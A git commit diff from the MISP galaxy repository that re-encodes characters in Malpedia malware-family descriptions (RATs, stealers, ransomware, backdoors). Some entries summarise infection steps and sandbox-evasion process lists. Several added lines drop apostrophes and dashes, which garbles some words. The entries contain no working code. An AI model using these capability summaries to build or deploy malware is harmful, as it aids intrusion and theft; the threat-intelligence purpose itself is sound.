MISP/misp-galaxy
6
0
Fork 0
mirror of https://github.com/MISP/misp-galaxy.git synced 2024-11-22 23:07:19 +00:00
Code Issues Projects Releases Packages Wiki Activity Actions 1

chg: [malpedia] jq all the things

Browse source
This commit is contained in:
Alexandre Dulaunoy 2023-09-26 10:48:49 +02:00
parent a9a051ffaa
commit 5d01afb537
Signed by: adulau
GPG key ID: 09E2CD4944E6CBCD
1 changed files with 110 additions and 110 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

220
clusters/malpedia.json
View file

@ -1362,7 +1362,7 @@
"value": "FluBot"
},
{
"description": "According to Check Point, this malware features several malicious Android applications that mimic legitimate applications, most of which have more than 1,000,000 installs. These malicious apps steal the victims\u2019 credentials and Two-Factor Authentication (2FA) codes. FluHorse targets different sectors of Eastern Asian markets and is distributed via emails. In some cases, the emails used in the first stage of the attacks belong to high-profile entities. The malware can remain undetected for months making it a persistent, dangerous, and hard-to-spot threat.",
"description": "According to Check Point, this malware features several malicious Android applications that mimic legitimate applications, most of which have more than 1,000,000 installs. These malicious apps steal the victims credentials and Two-Factor Authentication (2FA) codes. FluHorse targets different sectors of Eastern Asian markets and is distributed via emails. In some cases, the emails used in the first stage of the attacks belong to high-profile entities. The malware can remain undetected for months making it a persistent, dangerous, and hard-to-spot threat.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.fluhorse",
@ -1851,7 +1851,7 @@
"value": "JadeRAT"
},
{
"description": "Joker is one of the most well-known malware families on Android devices. It manages to take advantage of Google\u2019s official app store with the help of its trail signatures which includes updating the virus\u2019s code, execution process, and payload-retrieval techniques. This malware is capable of stealing users\u2019 personal information including contact details, device data, WAP services, and SMS messages.",
"description": "Joker is one of the most well-known malware families on Android devices. It manages to take advantage of Googles official app store with the help of its trail signatures which includes updating the viruss code, execution process, and payload-retrieval techniques. This malware is capable of stealing users personal information including contact details, device data, WAP services, and SMS messages.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.joker",
@ -2028,7 +2028,7 @@
"value": "Marcher"
},
{
"description": "According to heimdal, MasterFred malware, this is designed as an Android trojan that makes use of false login overlays to target not only Netflix, Instagram, and Twitter users, but also bank customers. The hackers\u2019 goal is to steal credit card information.",
"description": "According to heimdal, MasterFred malware, this is designed as an Android trojan that makes use of false login overlays to target not only Netflix, Instagram, and Twitter users, but also bank customers. The hackers goal is to steal credit card information.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.masterfred",
@ -2967,7 +2967,7 @@
"value": "Triada"
},
{
"description": "Bitdefender described Triout as a Android spyware, which appears to act as a framework for building extensive surveillance capabilities into seemingly benign applications. Found bundled with a repackaged app, the spyware\u2019s surveillance capabilities involve hiding its presence on the device, recording phone calls, logging incoming text messages, recoding videos, taking pictures and collecting GPS coordinates, then broadcasting all of that to an attacker-controlled C&C (command and control) server.",
"description": "Bitdefender described Triout as a Android spyware, which appears to act as a framework for building extensive surveillance capabilities into seemingly benign applications. Found bundled with a repackaged app, the spywares surveillance capabilities involve hiding its presence on the device, recording phone calls, logging incoming text messages, recoding videos, taking pictures and collecting GPS coordinates, then broadcasting all of that to an attacker-controlled C&C (command and control) server.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/apk.triout"
@ -4852,7 +4852,7 @@
"value": "FontOnLake"
},
{
"description": "Guardicore has discovered FritzFrog, a sophisticated peer-to-peer (P2P) botnet which has been actively breaching SSH servers since January 2020. It is a worm which is written in Golang, and is modular, multi-threaded and fileless, leaving no trace on the infected machine\u2019s disk. ",
"description": "Guardicore has discovered FritzFrog, a sophisticated peer-to-peer (P2P) botnet which has been actively breaching SSH servers since January 2020. It is a worm which is written in Golang, and is modular, multi-threaded and fileless, leaving no trace on the infected machines disk. ",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.fritzfrog",
@ -5188,7 +5188,7 @@
"value": "Hive (ELF)"
},
{
"description": "Checkpoint Research describes this as part of a custom firmware image affiliated with the Chinese state-sponsored actor \u201cCamaro Dragon\u201d, a custom MIPS32 ELF implant. HorseShell, the main implant inserted into the modified firmware by the attackers, provides the attacker with 3 main functionalities:\r\n* Remote shell: Execution of arbitrary shell commands on the infected router\r\n* File transfer: Upload and download files to and from the infected router.\r\n* SOCKS tunneling: Relay communication between different clients.",
"description": "Checkpoint Research describes this as part of a custom firmware image affiliated with the Chinese state-sponsored actor “Camaro Dragon”, a custom MIPS32 ELF implant. HorseShell, the main implant inserted into the modified firmware by the attackers, provides the attacker with 3 main functionalities:\r\n* Remote shell: Execution of arbitrary shell commands on the infected router\r\n* File transfer: Upload and download files to and from the infected router.\r\n* SOCKS tunneling: Relay communication between different clients.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.horseshell",
@ -5667,7 +5667,7 @@
"https://blog.sekoia.io/my-teas-not-cold-an-overview-of-china-cyber-threat/"
],
"synonyms": [
"M\u00e9lof\u00e9e"
"Mélofée"
],
"type": []
},
@ -6259,7 +6259,7 @@
"value": "pupy (ELF)"
},
{
"description": "The QNAPCrypt ransomware works similarly to other ransomware, including encrypting all files and delivering a ransom note. However, there are several important differences:\r\n\r\n1. The ransom note was included solely as a text file, without any message on the screen\u2014naturally, because it is a server and not an endpoint.\r\n\r\n2. Every victim is provided with a different, unique Bitcoin wallet\u2014this could help the attackers avoid being traced.\r\n\r\n3. Once a victim is compromised, the malware requests a wallet address and a public RSA key from the command and control server (C&C) before file encryption.",
"description": "The QNAPCrypt ransomware works similarly to other ransomware, including encrypting all files and delivering a ransom note. However, there are several important differences:\r\n\r\n1. The ransom note was included solely as a text file, without any message on the screennaturally, because it is a server and not an endpoint.\r\n\r\n2. Every victim is provided with a different, unique Bitcoin walletthis could help the attackers avoid being traced.\r\n\r\n3. Once a victim is compromised, the malware requests a wallet address and a public RSA key from the command and control server (C&C) before file encryption.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.qnapcrypt",
@ -6476,7 +6476,7 @@
"value": "RedAlert Ransomware"
},
{
"description": "A Trojan for Linux intended to infect machines with the SPARC architecture and Intel x86, x86-64 computers. The Trojan\u2019s configuration data is stored in a file encrypted with XOR algorithm",
"description": "A Trojan for Linux intended to infect machines with the SPARC architecture and Intel x86, x86-64 computers. The Trojans configuration data is stored in a file encrypted with XOR algorithm",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.rekoobe",
@ -6945,7 +6945,7 @@
"value": "Sunless"
},
{
"description": "Sustes Malware doesn\u2019t infect victims by itself (it\u2019s not a worm) but it is spread over exploitation and brute-force activities with special focus on IoT and Linux servers. The initial infection stage comes from a custom wget directly on the victim machine followed by a simple /bin/bash mr.sh. The script is a simple bash script which drops and executes additional software. ",
"description": "Sustes Malware doesnt infect victims by itself (its not a worm) but it is spread over exploitation and brute-force activities with special focus on IoT and Linux servers. The initial infection stage comes from a custom wget directly on the victim machine followed by a simple /bin/bash mr.sh. The script is a simple bash script which drops and executes additional software. ",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.sustes",
@ -8072,7 +8072,7 @@
"value": "Ratty"
},
{
"description": "Sorillus is a Java-based multifunctional remote access trojan (RAT) which targets Linux, macOS and Windows operating systems. While it was first created in 2019, interest in the tool has increased considerably in 2022. Beginning on January 18, 2022, different obfuscated client versions of the tool started to be uploaded to VirusTotal. Sorillus' features are described in detail on its website (hxxps://sorillus[.]com). The tool supposedly costs 49.99\u20ac for lifetime access but is currently available at a discounted 19.99\u20ac. Conveniently, the Sorillus can be purchased via a variety of cryptocurrencies. The tool's creator and distributor, a YouTube user known as \"Tapt\", asserts that the tool is able to collect the following information from its target:\r\n- HardwareID\r\n- Username\r\n- Country\r\n- Language\r\n- Webcam\r\n- Headless\r\n- Operating system\r\n- Client Version",
"description": "Sorillus is a Java-based multifunctional remote access trojan (RAT) which targets Linux, macOS and Windows operating systems. While it was first created in 2019, interest in the tool has increased considerably in 2022. Beginning on January 18, 2022, different obfuscated client versions of the tool started to be uploaded to VirusTotal. Sorillus' features are described in detail on its website (hxxps://sorillus[.]com). The tool supposedly costs 49.99€ for lifetime access but is currently available at a discounted 19.99€. Conveniently, the Sorillus can be purchased via a variety of cryptocurrencies. The tool's creator and distributor, a YouTube user known as \"Tapt\", asserts that the tool is able to collect the following information from its target:\r\n- HardwareID\r\n- Username\r\n- Country\r\n- Language\r\n- Webcam\r\n- Headless\r\n- Operating system\r\n- Client Version",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/jar.sorillus",
@ -8173,7 +8173,7 @@
"value": "Bateleur"
},
{
"description": "\u2022 BELLHOP is\ta JavaScript backdoor interpreted using the native Windows Scripting Host(WSH).\r\nAfter performing some basic host information gathering, the BELLHOP dropper\tdownloads a base64-encoded blob of JavaScript to disk and\tsets\tup persistence in three ways:\r\n\u2022 Creating a Run key in the Registry\r\n\u2022 Creating a RunOnce key in the Registry\r\n\u2022 Creating a persistent named scheduled task\r\n\u2022 BELLHOP communicates using HTTP\tand HTTPS with primarily benign sites such as Google\tDocs and PasteBin.\r\n",
"description": " BELLHOP is\ta JavaScript backdoor interpreted using the native Windows Scripting Host(WSH).\r\nAfter performing some basic host information gathering, the BELLHOP dropper\tdownloads a base64-encoded blob of JavaScript to disk and\tsets\tup persistence in three ways:\r\n• Creating a Run key in the Registry\r\n• Creating a RunOnce key in the Registry\r\n• Creating a persistent named scheduled task\r\n• BELLHOP communicates using HTTP\tand HTTPS with primarily benign sites such as Google\tDocs and PasteBin.\r\n",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/js.bellhop",
@ -8249,7 +8249,7 @@
"value": "CukieGrab"
},
{
"description": "Prevailion found this RAT written in JavaScript, which dynamically compiles an accompanying keylogger written in C# and uses a DGA f\u00fcr C&C.",
"description": "Prevailion found this RAT written in JavaScript, which dynamically compiles an accompanying keylogger written in C# and uses a DGA für C&C.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/js.darkwatchman",
@ -8418,7 +8418,7 @@
"value": "grelos"
},
{
"description": "GRIFFON is a lightweight JavaScript validator-style implant without any persistence mechanism. The malware is designed for receiving modules to be executed in-memory and sending the results to C2s. The first module downloaded by the GRIFFON malware to the victim\u2019s computer is an information-gathering JavaScript, which allows the cybercriminals to understand the context of the infected workstation.",
"description": "GRIFFON is a lightweight JavaScript validator-style implant without any persistence mechanism. The malware is designed for receiving modules to be executed in-memory and sending the results to C2s. The first module downloaded by the GRIFFON malware to the victims computer is an information-gathering JavaScript, which allows the cybercriminals to understand the context of the infected workstation.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/js.griffon",
@ -8692,7 +8692,7 @@
"value": "NodeRAT"
},
{
"description": "Ostap is a commodity JScript downloader first seen in campaigns in 2016. It has been observed being delivered in ACE archives and VBA macro-enabled Microsoft Office documents. Recent versions of Ostap query WMI to check for a blacklist of running processes:\r\n\r\nAgentSimulator.exe\r\nanti-virus.EXE\r\nBehaviorDumper\r\nBennyDB.exe\r\nctfmon.exe\r\nfakepos_bin\r\nFrzState2k\r\ngemu-ga.exe (Possible misspelling of Qemu hypervisor\u2019s guest agent, qemu-ga.exe)\r\nImmunityDebugger.exe\r\nKMS Server Service.exe\r\nProcessHacker\r\nprocexp\r\nProxifier.exe\r\npython\r\ntcpdump\r\nVBoxService\r\nVBoxTray.exe\r\nVmRemoteGuest\r\nvmtoolsd\r\nVMware2B.exe\r\nVzService.exe\r\nwinace\r\nWireshark\r\n\r\nIf a blacklisted process is found, the malware terminates.\r\n\r\nOstap has been observed delivering other malware families, including Nymaim, Backswap and TrickBot.",
"description": "Ostap is a commodity JScript downloader first seen in campaigns in 2016. It has been observed being delivered in ACE archives and VBA macro-enabled Microsoft Office documents. Recent versions of Ostap query WMI to check for a blacklist of running processes:\r\n\r\nAgentSimulator.exe\r\nanti-virus.EXE\r\nBehaviorDumper\r\nBennyDB.exe\r\nctfmon.exe\r\nfakepos_bin\r\nFrzState2k\r\ngemu-ga.exe (Possible misspelling of Qemu hypervisors guest agent, qemu-ga.exe)\r\nImmunityDebugger.exe\r\nKMS Server Service.exe\r\nProcessHacker\r\nprocexp\r\nProxifier.exe\r\npython\r\ntcpdump\r\nVBoxService\r\nVBoxTray.exe\r\nVmRemoteGuest\r\nvmtoolsd\r\nVMware2B.exe\r\nVzService.exe\r\nwinace\r\nWireshark\r\n\r\nIf a blacklisted process is found, the malware terminates.\r\n\r\nOstap has been observed delivering other malware families, including Nymaim, Backswap and TrickBot.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/js.ostap",
@ -9181,7 +9181,7 @@
"value": "CloudMensis"
},
{
"description": "CoinThief was a malware package designed to steal Bitcoins from the victim, consisting of a binary patcher, browser extensions, and a backdoor component. \r\n\r\nIt was spreading in early 2014 from several different sources: \r\n- on Github (where the trojanized compiled binary didn\u2019t match the displayed source code), o\r\n- on popular and trusted download sites line CNET's Download.com or MacUpdate.com, and \r\n- as cracked applications via torrents camouflaged as Bitcoin Ticker TTM, BitVanity, StealthBit, Litecoin Ticker, BBEdit, Pixelmator, Angry Birds and Delicious Library.\r\n\r\nThe patcher\u2018s role was to locate and modify legitimate versions of the Bitcoin-Qt wallet application. The analyzed malware samples targeted versions of Bitcoin-Qt 0.8.1, 0.8.0 and 0.8.5. The earlier patch modified Bitcoin-Qt adding malicious code that would send nearly all the victim\u2019s Bitcoins to one of the hard-coded addresses belonging to the attacker. \r\n\r\nThe browser extensions targeted Chrome and Firefox and are disguised as a \u201cPop-up blocker\u201d. The extensions monitored visited websites, download malicious JavaScripts and injected them into various Bitcoin-related websites (mostly Bitcoin exchanges and online wallet sites). The injected JS scripts were able to modify transactions to redirect Bitcoin transfers to an attacker\u2019s address or simply harvest login credentials to the targeted online service.\r\n\r\nThe backdoor enabled the attacker to take full control over the victim\u2019s computer:\r\n- collect information about the infected computer\r\n- execute arbitrary shell scripts on the target computer\r\n- upload an arbitrary file from the victim\u2019s hard drive to a remote server\r\n- update itself to a newer version",
"description": "CoinThief was a malware package designed to steal Bitcoins from the victim, consisting of a binary patcher, browser extensions, and a backdoor component. \r\n\r\nIt was spreading in early 2014 from several different sources: \r\n- on Github (where the trojanized compiled binary didnt match the displayed source code), o\r\n- on popular and trusted download sites line CNET's Download.com or MacUpdate.com, and \r\n- as cracked applications via torrents camouflaged as Bitcoin Ticker TTM, BitVanity, StealthBit, Litecoin Ticker, BBEdit, Pixelmator, Angry Birds and Delicious Library.\r\n\r\nThe patchers role was to locate and modify legitimate versions of the Bitcoin-Qt wallet application. The analyzed malware samples targeted versions of Bitcoin-Qt 0.8.1, 0.8.0 and 0.8.5. The earlier patch modified Bitcoin-Qt adding malicious code that would send nearly all the victims Bitcoins to one of the hard-coded addresses belonging to the attacker. \r\n\r\nThe browser extensions targeted Chrome and Firefox and are disguised as a “Pop-up blocker”. The extensions monitored visited websites, download malicious JavaScripts and injected them into various Bitcoin-related websites (mostly Bitcoin exchanges and online wallet sites). The injected JS scripts were able to modify transactions to redirect Bitcoin transfers to an attackers address or simply harvest login credentials to the targeted online service.\r\n\r\nThe backdoor enabled the attacker to take full control over the victims computer:\r\n- collect information about the infected computer\r\n- execute arbitrary shell scripts on the target computer\r\n- upload an arbitrary file from the victims hard drive to a remote server\r\n- update itself to a newer version",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.cointhief",
@ -9355,7 +9355,7 @@
"value": "Dummy"
},
{
"description": "Eleanor comes as a drag-and-drop file utility called EasyDoc Converter. This application bundle wraps a shell script that uses Dropbox name as a disguise and installs three components: a hidden Tor service, a Pastebin agent and a web service with a PHP-based graphical interface.\r\n\r\nThe Tor service transforms the victim\u2019s computer into a server that provides attackers with full anonymous access to the infected machine via Tor-generated address. \r\n\r\nThe Pastebin agent uploads the address in encrypted form to the Pastebin website where the attackers can obtain it.\r\n\r\nThe web service is the main malicious component that provides the attackers with the control over the infected machine. After successful authentication, the interface offers several control panels to the attackers, allowing them to do the following actions:\r\n\r\n- Managing files\r\n- Listing processes\r\n- Connecting to various database management systems such as MySQL or SQLite\r\n- Connecting via bind/reverse shell\r\n- Executing shell command\r\n- Capturing and browsing images and videos from the victim\u2019s webcam\r\n- Sending emails with an attachment",
"description": "Eleanor comes as a drag-and-drop file utility called EasyDoc Converter. This application bundle wraps a shell script that uses Dropbox name as a disguise and installs three components: a hidden Tor service, a Pastebin agent and a web service with a PHP-based graphical interface.\r\n\r\nThe Tor service transforms the victims computer into a server that provides attackers with full anonymous access to the infected machine via Tor-generated address. \r\n\r\nThe Pastebin agent uploads the address in encrypted form to the Pastebin website where the attackers can obtain it.\r\n\r\nThe web service is the main malicious component that provides the attackers with the control over the infected machine. After successful authentication, the interface offers several control panels to the attackers, allowing them to do the following actions:\r\n\r\n- Managing files\r\n- Listing processes\r\n- Connecting to various database management systems such as MySQL or SQLite\r\n- Connecting via bind/reverse shell\r\n- Executing shell command\r\n- Capturing and browsing images and videos from the victims webcam\r\n- Sending emails with an attachment",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.eleanor",
@ -9536,7 +9536,7 @@
"value": "Gmera"
},
{
"description": "According to Malwarebytes, The HiddenLotus \"dropper\" is an application named L\u00ea Thu H\u00e0 (HAEDC).pdf, using an old trick of disguising itself as a document - in this case, an Adobe Acrobat file.",
"description": "According to Malwarebytes, The HiddenLotus \"dropper\" is an application named Lê Thu Hà (HAEDC).pdf, using an old trick of disguising itself as a document - in this case, an Adobe Acrobat file.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.hiddenlotus",
@ -9976,7 +9976,7 @@
"value": "Patcher"
},
{
"description": "Backdoor as a fork of OpenSSH_6.0 with no logging, and \u201c-P\u201d and \u201c-z\u201d hidden command arguments. \u201cPuffySSH_5.8p1\u201d string.",
"description": "Backdoor as a fork of OpenSSH_6.0 with no logging, and “-P” and “-z” hidden command arguments. “PuffySSH_5.8p1” string.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.pintsized",
@ -10113,7 +10113,7 @@
"value": "Shlayer"
},
{
"description": "According to Red Canary, Silver Sparrow is an activity cluster that includes a binary compiled to run on Apple\u2019s new M1 chips but has been distributed without payload so far.",
"description": "According to Red Canary, Silver Sparrow is an activity cluster that includes a binary compiled to run on Apples new M1 chips but has been distributed without payload so far.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.silver_sparrow",
@ -11080,7 +11080,7 @@
"value": "PowerWare"
},
{
"description": "PowerZure is a PowerShell project created to assess and exploit resources within Microsoft\u2019s cloud platform, Azure. PowerZure was created out of the need for a framework that can both perform reconnaissance and exploitation of Azure, AzureAD, and the associated resources.",
"description": "PowerZure is a PowerShell project created to assess and exploit resources within Microsofts cloud platform, Azure. PowerZure was created out of the need for a framework that can both perform reconnaissance and exploitation of Azure, AzureAD, and the associated resources.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerzure",
@ -12332,7 +12332,7 @@
"value": "3CX Backdoor (Windows)"
},
{
"description": "Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim\u2019s sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.",
"description": "Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger",
@ -12411,7 +12411,7 @@
"value": "7ev3n"
},
{
"description": "The 8Base ransomware group has remained relatively unknown despite the massive spike in activity in Summer of 2023. The group utilizes encryption paired with \u201cname-and-shame\u201d techniques to compel their victims to pay their ransoms. 8Base has an opportunistic pattern of compromise with recent victims spanning across varied industries. Despite the high amount of compromises, the information regarding identities, methodology, and underlying motivation behind these incidents still remains a mystery. Samples of their ransomware show they are using customized Phobos with SmokeLoader.",
"description": "The 8Base ransomware group has remained relatively unknown despite the massive spike in activity in Summer of 2023. The group utilizes encryption paired with “name-and-shame” techniques to compel their victims to pay their ransoms. 8Base has an opportunistic pattern of compromise with recent victims spanning across varied industries. Despite the high amount of compromises, the information regarding identities, methodology, and underlying motivation behind these incidents still remains a mystery. Samples of their ransomware show they are using customized Phobos with SmokeLoader.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.8base",
@ -12676,7 +12676,7 @@
"value": "Adamantium Thief"
},
{
"description": "Adam Locker (detected as RANSOM_ADAMLOCK.A) is a ransomware that encrypts targeted files on a victim\u2019s system but offers them a free decryption key which can be accessed through Adf.ly, a URL shortening and advertising service.",
"description": "Adam Locker (detected as RANSOM_ADAMLOCK.A) is a ransomware that encrypts targeted files on a victims system but offers them a free decryption key which can be accessed through Adf.ly, a URL shortening and advertising service.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.adam_locker",
@ -13042,7 +13042,7 @@
"value": "Albaniiutas"
},
{
"description": "According to Trend Micro Encyclopia:\r\nALDIBOT first appeared in late August 2012 in relevant forums. Variants can steal passwords from the browser Mozilla Firefox, instant messenger client Pidgin, and the download manager jDownloader. ALDIBOT variants send the gathered information to their command-and-control (C&C) servers.\r\n\r\nThis malware family can also launch Distributed Denial of Service (DDoS) attacks using different protocols such as HTTP, TCP, UDP, and SYN. It can also perform flood attacks via Slowloris and Layer 7.\r\n\r\nThis bot can also be set up as a SOCKS proxy to abuse the infected machine as a proxy for any protocols.\r\n\r\nThis malware family can download and execute arbitrary files, and update itself. Variants can steal information, gathering the infected machine\u2019s hardware identification (HWID), host name, local IP address, and OS version.\r\n\r\nThis backdoor executes commands from a remote malicious user, effectively compromising the affected system.",
"description": "According to Trend Micro Encyclopia:\r\nALDIBOT first appeared in late August 2012 in relevant forums. Variants can steal passwords from the browser Mozilla Firefox, instant messenger client Pidgin, and the download manager jDownloader. ALDIBOT variants send the gathered information to their command-and-control (C&C) servers.\r\n\r\nThis malware family can also launch Distributed Denial of Service (DDoS) attacks using different protocols such as HTTP, TCP, UDP, and SYN. It can also perform flood attacks via Slowloris and Layer 7.\r\n\r\nThis bot can also be set up as a SOCKS proxy to abuse the infected machine as a proxy for any protocols.\r\n\r\nThis malware family can download and execute arbitrary files, and update itself. Variants can steal information, gathering the infected machines hardware identification (HWID), host name, local IP address, and OS version.\r\n\r\nThis backdoor executes commands from a remote malicious user, effectively compromising the affected system.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.aldibot",
@ -13229,7 +13229,7 @@
"value": "ALPC Local PrivEsc"
},
{
"description": "The Alphabet ransomware is a new screenlocker that is currently being developed by a criminal developer. As the malware is not ready it does not affect any user files.\r\n\r\nThe virus includes a screenlocking function which locks the user\u2019s screen and prohibits any interaction with the computer.",
"description": "The Alphabet ransomware is a new screenlocker that is currently being developed by a criminal developer. As the malware is not ready it does not affect any user files.\r\n\r\nThe virus includes a screenlocking function which locks the users screen and prohibits any interaction with the computer.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.alphabet_ransomware",
@ -13282,7 +13282,7 @@
"value": "AlphaSeed"
},
{
"description": "Alreay is a remote access trojan that uses HTTP(S) or TCP for communication with its C&C server.\r\n\r\nIt uses either RC4 or DES for encryption of its configuration, which is stored in the registry.\r\n\r\nIt sends detailed information about the victim's environment, like computer name, Windows version, \r\nsystem locale, and network configuration.\r\n\r\nIt supports almost 25 commands that include operations on the victim\u2019s filesystem, basic process management, file exfiltration, command line execution, and process injection of an executable downloaded from the attacker\u2019s C&C server. As in many RATs from Lazarus arsenal, the commands are indexed by 32-bit integers, starting with values like 0x21A8B293, 0x23FAE29C or 0x91B93485.\r\n\r\nIt comes either as an EXE or as a DLL with the internal DLL name t_client_dll.dll. It may contain statically linked code from open-source libraries like Mbed TLS or zLib (version 1.0.1).\r\n\r\nAlreay RAT was observed in 2016-2017, running on networks of banks operating SWIFT Alliance software.",
"description": "Alreay is a remote access trojan that uses HTTP(S) or TCP for communication with its C&C server.\r\n\r\nIt uses either RC4 or DES for encryption of its configuration, which is stored in the registry.\r\n\r\nIt sends detailed information about the victim's environment, like computer name, Windows version, \r\nsystem locale, and network configuration.\r\n\r\nIt supports almost 25 commands that include operations on the victims filesystem, basic process management, file exfiltration, command line execution, and process injection of an executable downloaded from the attackers C&C server. As in many RATs from Lazarus arsenal, the commands are indexed by 32-bit integers, starting with values like 0x21A8B293, 0x23FAE29C or 0x91B93485.\r\n\r\nIt comes either as an EXE or as a DLL with the internal DLL name t_client_dll.dll. It may contain statically linked code from open-source libraries like Mbed TLS or zLib (version 1.0.1).\r\n\r\nAlreay RAT was observed in 2016-2017, running on networks of banks operating SWIFT Alliance software.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.alreay",
@ -13520,7 +13520,7 @@
"value": "Andromeda"
},
{
"description": "According to Proofpoint, AndroMut is a new downloader malware written in C++ that Proofpoint researchers began observing in the wild in June 2019. The \u201cAndro\u201d part of the name comes from some of the pieces which bear resemblance to another downloader malware known as Andromeda [1] and \u201cMut\u201d is based off a mutex that the analyzed sample creates: \u201cmutshellmy777\u201d.",
"description": "According to Proofpoint, AndroMut is a new downloader malware written in C++ that Proofpoint researchers began observing in the wild in June 2019. The “Andro” part of the name comes from some of the pieces which bear resemblance to another downloader malware known as Andromeda [1] and “Mut” is based off a mutex that the analyzed sample creates: “mutshellmy777”.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.andromut",
@ -13804,7 +13804,7 @@
"value": "Ares (Windows)"
},
{
"description": "AresLoader is a new malware \"downloader\" that has been advertised on some Russian language Dark Web forums \u201cRAMP and \"XSS\" by a threat actor called \"DarkBLUP\". Researchers assess this loader is likely a legitimate penetration testing tool that is now being abused by threat actors. This is because of a similar project, dubbed \u201cProject Ares,\u201d was previously uploaded to GitHub as a proof-of-concept (PoC) by the well-regarded user and red teamer \u201cCerberSec.\u201d\r\n\r\nThe loader mimics legitimate software to trick victims into executing malware with administrator rights on their machines. Additional features of the loader include:\r\n\r\n1. Written in C/C++\r\n2. Supports 64-bit payloads\r\n3. Makes it look like malware spawned by another process\r\n4. Prevents non-Microsoft signed binaries from being injected into malware\r\n5. Hides suspicious imported Windows APIs\r\n6. Leverages anti-analysis techniques to avoid reverse engineering\r\n\r\nFurthermore, It was observed that SystemBC, Amadey, and several Raccoon Stealers were directly installing AresLoader. To date, the AresLoader downloader has been seen delivering payloads like SystemBC, Lumma Stealer, StealC, Aurora Stealer, and Laplas Clipper.",
"description": "AresLoader is a new malware \"downloader\" that has been advertised on some Russian language Dark Web forums RAMP and \"XSS\" by a threat actor called \"DarkBLUP\". Researchers assess this loader is likely a legitimate penetration testing tool that is now being abused by threat actors. This is because of a similar project, dubbed “Project Ares,” was previously uploaded to GitHub as a proof-of-concept (PoC) by the well-regarded user and red teamer “CerberSec.”\r\n\r\nThe loader mimics legitimate software to trick victims into executing malware with administrator rights on their machines. Additional features of the loader include:\r\n\r\n1. Written in C/C++\r\n2. Supports 64-bit payloads\r\n3. Makes it look like malware spawned by another process\r\n4. Prevents non-Microsoft signed binaries from being injected into malware\r\n5. Hides suspicious imported Windows APIs\r\n6. Leverages anti-analysis techniques to avoid reverse engineering\r\n\r\nFurthermore, It was observed that SystemBC, Amadey, and several Raccoon Stealers were directly installing AresLoader. To date, the AresLoader downloader has been seen delivering payloads like SystemBC, Lumma Stealer, StealC, Aurora Stealer, and Laplas Clipper.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.aresloader",
@ -13920,7 +13920,7 @@
"value": "Arkei Stealer"
},
{
"description": "It is available as a service, purchasable by anyone to use in their own campaigns. It\u2019s features are generally fairly typical of a RAT, with its most notable aspect being the hVNC module which basically gives an attacker full remote access with minimal need for technical knowledge to use it.",
"description": "It is available as a service, purchasable by anyone to use in their own campaigns. Its features are generally fairly typical of a RAT, with its most notable aspect being the hVNC module which basically gives an attacker full remote access with minimal need for technical knowledge to use it.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.arrowrat",
@ -14108,7 +14108,7 @@
"value": "AstraLocker"
},
{
"description": "AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victim\u2019s computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.",
"description": "AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool, however, it could also be used maliciously because it provides functionality such as keylogger, remote desktop control, and many other functions that may cause harm to the victims computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kit and other techniques.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat",
@ -14312,7 +14312,7 @@
"value": "ATOMSILO"
},
{
